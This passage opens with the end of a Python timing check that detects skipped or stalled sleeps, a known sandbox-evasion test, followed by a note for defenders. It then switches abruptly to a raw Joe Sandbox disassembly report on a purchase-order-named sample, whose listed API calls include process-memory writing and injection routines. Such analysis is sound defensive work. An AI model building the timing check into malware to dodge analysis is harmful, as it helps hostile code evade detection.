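        verdict = "accelerated"   # sleep skipped or shortened: sandbox-style
    elif best > requested_ms * slow_ratio:
        verdict = "stalled"       # far too slow: single-stepping or a starved VM
    else:
        verdict = "consistent"
    return {"requested_ms": requested_ms, "elapsed_ms": best,
            "samples_ms": elapsed, "verdict": verdict}


if __name__ == "__main__":
    print("real sleep     :", timing_check(20)["verdict"])
    print("skipped sleep  :", timing_check(20, sleep=lambda s: None)["verdict"])
    print("stalled clock  :", timing_check(20, sleep=lambda s: None,
                                           clock=make_fake_clock(5.0))["verdict"])
```

For defenders the useful consequence is the inverse: a sandbox that fast-forwards Sleep without also adjusting what QueryPerformanceCounter returns is visible to this check, so sleep-skipping has to be paired with consistent clock virtualisation.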
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$Icon
                                                                  • String ID:
                                                                  • API String ID: 4023252218-0
                                                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1489400265-0
                                                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                  APIs
                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                  • DestroyWindow.USER32(?), ref: 00455728
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 1042038666-0
                                                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0041780F
                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                  • __getptd.LIBCMT ref: 00417826
                                                                  • __amsg_exit.LIBCMT ref: 00417834
                                                                  • __lock.LIBCMT ref: 00417844
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                  APIs
                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                  Similarity
                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 2403457894-0
                                                                  • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                  • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                  • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                  • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                  APIs
                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                  Similarity
                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 4247068974-0
                                                                  • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                  • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                  • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                  • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: )$U$\
                                                                  • API String ID: 0-3705770531
                                                                  • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                  • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                  • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                  • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                  APIs
                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                  • CoUninitialize.OLE32 ref: 0046E53D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                  • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                  • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                  • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                  • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                  • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                  • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                  • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                  • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                  • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                  Similarity
                                                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 708495834-557222456
                                                                  • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                  • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                  • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                  • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                  APIs
                                                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \$]$h
                                                                  • API String ID: 4104443479-3262404753
                                                                  APIs
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                  • String ID: <$@
                                                                  • API String ID: 2417854910-1426351568
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3705125965-3916222277
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem
                                                                  • String ID: 0
                                                                  • API String ID: 135850232-4108050209
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
